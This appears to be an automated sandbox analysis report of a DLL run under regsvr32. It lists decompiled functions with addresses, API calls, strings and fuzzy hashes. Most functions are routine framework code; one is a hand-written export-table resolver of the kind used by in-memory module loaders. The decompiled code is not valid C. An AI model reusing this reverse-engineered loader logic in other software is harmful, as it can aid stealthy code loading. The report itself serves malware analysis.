				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_v172 = 0x10057298;
					E10017C83( &_v172, 0x1002e2fc);
					asm("int3");
					_push(4);
					E10017BC1(E10027DEC, _t38, _t42, _t43);
					_t40 = E10013965(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
						_t35 = E1000CF71(_t40);
					}
					return E10017C60(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E100174D0(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x1002a144;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x1005aa80 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x1005aa80 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E100167D5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}

0x1000b3b0
0x1000b3ba
0x1000b3c1
0x1000b3c5
0x1000b3c6
0x1000b3c7
0x1000b3cd
0x1000b3d6
0x1000b3d9
0x1000b3dc
0x1000a0db
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000b3e8
0x1000b3eb
0x1000b3ef
0x1000b3ef
0x1000b3f0
0x1000b3f3
0x1000b3f4
0x1000b3f6
0x1000b3f9
0x1000b3fe
0x1000b402
0x1000b405
0x1000b407
0x1000b40c
0x1000b410
0x1000b410
0x1000b413
0x1000b416
0x1000b418
0x1000b418
0x1000b429
0x1000b431
0x1000b439
0x1000b43c
0x1000b43f
0x1000b443
0x1000b448
0x1000b44b
0x1000b452
0x1000b452
0x1000b456
0x1000b458
0x1000b45b
0x1000b45f
0x1000b462
0x1000b464
0x1000b467
0x1000b46a
0x1000b46a
0x1000b46a
0x1000b46f
0x1000b47b
0x1000b483
0x1000b484
0x1000b485
0x1000b48a
0x1000b48b
0x1000b493
0x1000b499
0x1000b499
0x1000b49e
0x1000b4a1
0x1000b4a3
0x1000b4a8
0x1000b4ab
0x1000b4ab
0x1000b4ac
0x1000b4ac

APIs

GetMenuCheckMarkDimensions.USER32 ref: 1000B3C7
_memset.LIBCMT ref: 1000B429
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 1000B47B
LoadBitmapA.USER32 ref: 1000B493

Strings

, xrefs: 1000B3E8

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
Instruction ID: 72b3b778e8896de6b9c4d2b5d37ea691cdfdc38a5381d0430ce67680fa501abd
Opcode Fuzzy Hash: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
Instruction Fuzzy Hash: 5931F572A0065A9FFB10CF78CCC6AAE7BB5EB44384F25052AE506EB1C5D730EA45C750

Uniqueness

Uniqueness Score: -1.00%

Function 1000D86F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E1000D86F(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E1000D6C3() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E100199D4(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x1005a760(_a4, _a8);
			}

0x1000d87c
0x1000d895
0x1000d900
0x1000d900
0x1000d902
0x00000000
0x1000d903
0x1000d897
0x1000d89e
0x00000000
0x1000d8b7
0x1000d8b8
0x1000d8bb
0x1000d8c9
0x1000d8cc
0x1000d8d4
0x1000d8d5
0x1000d8d6
0x1000d8d7
0x1000d8de
0x1000d8e1
0x1000d8e5
0x1000d8f4
0x1000d8f9
0x1000d8fc
0x00000000
0x1000d8fc
0x1000d89e
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000D8AD
GetSystemMetrics.USER32 ref: 1000D8C5
GetSystemMetrics.USER32 ref: 1000D8CC

Strings

DISPLAY, xrefs: 1000D8E9
B, xrefs: 1000D88C

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
Instruction ID: 9954a119ce47e65a3950f6e4b3e830268b9633322f26d87d987c4675ad6ec402
Opcode Fuzzy Hash: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
Instruction Fuzzy Hash: 7C118F71600328ABEB11EF649C84B9F7EA8EF057D0B108066FD09AA14AD6719951CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C570, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C570(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E1000DFD6(__ecx, __eflags, _t26) == 0) {
					_t10 = E1001040B(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E1000E426(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E100140D6(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

0x1000c570
0x1000c570
0x1000c572
0x1000c577
0x1000c580
0x1000c589
0x1000c58e
0x1000c590
0x1000c59c
0x1000c59c
0x1000c5a3
0x1000c5fe
0x00000000
0x1000c601
0x1000c5a5
0x1000c5a8
0x1000c5ab
0x1000c5b2
0x1000c5bc
0x1000c5be
0x00000000
0x00000000
0x1000c5c7
0x1000c5cc
0x1000c5ce
0x00000000
0x00000000
0x1000c5d5
0x1000c5db
0x1000c5dd
0x1000c5ea
0x1000c5f6
0x00000000
0x1000c5f6
0x1000c5e0
0x1000c5e6
0x1000c5e8
0x00000000
0x00000000
0x00000000
0x1000c5e8
0x1000c5ad
0x1000c5b0
0x00000000
0x00000000
0x00000000
0x1000c5b0
0x1000c592
0x1000c596
0x00000000
0x00000000
0x00000000
0x1000c598
0x1000c582
0x00000000

Strings

Edit, xrefs: 1000C5C0

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
Instruction ID: c36f5ccd8b34139a66e87801a9a5321a409f351d494de0105f07b228c10d2adb
Opcode Fuzzy Hash: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
Instruction Fuzzy Hash: F4015E3820070AA7FA65DB258D45F5AB6E5EF056D2F214429F942F10B8CFB0FD91D560

Uniqueness

Uniqueness Score: -1.00%

Function 1000BC89, Relevance: 7.6, APIs: 5, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1000BC89(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x10057a08; // 0x7d1a16f8
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E10017BF4(E10027F23, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E10009FA3(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E1000BC89(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E10009CB7( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E100167D5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}

0x1000bc89
0x1000bc90
0x1000bc94
0x1000bc9b
0x1000bca1
0x1000bca8
0x1000bcad
0x1000bcb5
0x1000bcbb
0x1000bcc1
0x1000bcc4
0x1000bcc7
0x1000bccd
0x1000bcd1
0x1000bcd7
0x1000bce5
0x1000bceb
0x1000bced
0x1000bcef
0x00000000
0x00000000
0x1000bcf1
0x1000bcf7
0x1000bcfb
0x1000bd07
0x1000bd13
0x1000bd17
0x1000bd1d
0x1000bd21
0x1000bd28
0x1000bd2a
0x00000000
0x1000bd2a
0x00000000
0x1000bd28
0x1000bd4b
0x1000bd51
0x1000bd5b
0x1000bd66
0x1000bd53
0x1000bd53
0x1000bd59
0x00000000
0x00000000
0x1000bd59
0x1000bd6b
0x1000bd6b
0x1000bd76
0x1000bd7e
0x1000bd7f
0x1000bd80
0x1000bd89
0x1000bd8e
0x1000bd95

APIs

__EH_prolog3_catch.LIBCMT ref: 1000BCA8
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1000BCC7
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BCE5
RegDeleteKeyA.ADVAPI32(?,?), ref: 1000BD60
RegCloseKey.ADVAPI32(?), ref: 1000BD6B

Part of subcall function 10009FA3: __EH_prolog3.LIBCMT ref: 10009FAA

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
String ID:
API String ID: 301487041-0
Opcode ID: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
Instruction ID: 653bf45c983c6aa9a2c45ec2c29e65d920d70d1e6a7a13c67c9db93679124605
Opcode Fuzzy Hash: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
Instruction Fuzzy Hash: 0921A075D0465A9FEB21DF94CC81AEDB7B0FF04390F104126ED55A7290EB705E44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10013F9E, Relevance: 7.6, APIs: 5, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10013F9E(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x10057a08; // 0x7d1a16f8
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E1000A0DB(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E100174D0(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E100167D5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}

0x10013f9e
0x10013f9e
0x10013fa7
0x10013fae
0x10013fb2
0x10013fb5
0x10013fb8
0x10013fbc
0x10013fbe
0x10013fbe
0x10013fbe
0x10013fc5
0x00000000
0x00000000
0x10013fd3
0x10013fde
0x10013fe5
0x10013ff4
0x1001401d
0x1001401d
0x10014031

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 10013FC8
_memset.LIBCMT ref: 10013FE5
GetWindowTextA.USER32 ref: 10013FFF
lstrcmpA.KERNEL32(00000000,?), ref: 10014011
SetWindowTextA.USER32(?,?), ref: 1001401D

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
Instruction ID: fa7108181993de9b8ea87dd6eaa7291c2451852d429ff63cadea9d36e3b3e8b2
Opcode Fuzzy Hash: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
Instruction Fuzzy Hash: 3901C0B6A00228ABE711DB65DCC4FDF77ACEF18790F110065EA45D7141DA70DE848BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10010C0F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E10010C0F(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E1001431B(__ebx, _t25, __ebp, 0xc);
				_push(E100100DE);
				_t26 = E100139F5(__ebx, 0x1005a8e0, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E1000A0DB(_t21, 0x1005a8e0, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E10014388(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E1000E725(_t21, 0x1005a8e0, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

0x10010c0f
0x10010c0f
0x10010c0f
0x10010c12
0x10010c17
0x10010c26
0x10010c28
0x10010c2a
0x10010c2c
0x10010c2c
0x10010c31
0x10010c35
0x10010c6f
0x10010c71
0x00000000
0x10010c37
0x10010c37
0x10010c3c
0x10010c44
0x10010c47
0x10010c53
0x10010c59
0x10010c5b
0x10010c5e
0x00000000
0x00000000
0x10010c63
0x10010c69
0x10010c69
0x00000000
0x10010c49

APIs

Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
Part of subcall function 1001431B: InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
Part of subcall function 1001431B: LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F

Part of subcall function 100139F5: __EH_prolog3_catch.LIBCMT ref: 100139FC

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 10010C53
FreeLibrary.KERNEL32(?), ref: 10010C63

Strings

hhctrl.ocx, xrefs: 10010C37
HtmlHelpA, xrefs: 10010C4D

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
Instruction ID: 8873b40b3358b87e9332ca8c9146562190e137befea279647b799a71fcd87530
Opcode Fuzzy Hash: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
Instruction Fuzzy Hash: 7001F431204303DFE321DFA1DE05B4A76E0EF05781F018A08F4DAA8061DBB1D8D0DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 100224E9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E100224E9() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x1002bb98;
					_v28 =  *0x1002bb90;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x100224ee
0x100224f6
0x1002250d
0x100224b9
0x100224c2
0x100224ce
0x100224d1
0x100224d4
0x100224d6
0x100224d9
0x100224de
0x100224e8
0x100224e0
0x100224e4
0x100224e4
0x100224f8
0x100224fe
0x10022506
0x00000000
0x10022508
0x10022508
0x1002250c
0x1002250c
0x10022506

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1001A130), ref: 100224EE
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 100224FE

Strings

IsProcessorFeaturePresent, xrefs: 100224F8
KERNEL32, xrefs: 100224E9

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
Instruction ID: b1380c49f8d15cda8b98f9f56e3724ed638b8beb480886d8724856f67b077174
Opcode Fuzzy Hash: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
Instruction Fuzzy Hash: EDF03030900D1EE2EF00ABE1BC596AF7A78FB44785FD20490E681B0088DF7181718681

Uniqueness

Uniqueness Score: -1.00%

Function 10002D50, Relevance: 6.4, APIs: 5, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002D50(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				signed short* _v36;
				intOrPtr _v40;
				void* _t79;
				void* _t119;

				_v40 = __ecx;
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v12 = 0;
				_v16 =  *_a4 + 0x78;
				if( *((intOrPtr*)(_v16 + 4)) != 0) {
					_v8 = _v20 +  *_v16;
					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x20));
							_v36 = _v20 +  *((intOrPtr*)(_v8 + 0x24));
							_v24 = 0;
							_v28 = 0;
							while(_v28 <  *((intOrPtr*)(_v8 + 0x18))) {
								_t79 = E10001F70(_a8, _v20 +  *_v32);
								_t119 = _t119 + 8;
								if(_t79 != 0) {
									_v28 = _v28 + 1;
									_v32 = _v32 + 4;
									_v36 =  &(_v36[1]);
									continue;
								}
								_v12 =  *_v36 & 0x0000ffff;
								_v24 = 1;
								break;
							}
							if(_v24 != 0) {
								L17:
								if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
									return _v20 +  *((intOrPtr*)(_v20 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
								}
								SetLastError(0x7f);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L17;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}

0x10002d56
0x10002d5f
0x10002d62
0x10002d71
0x10002d7b
0x10002d94
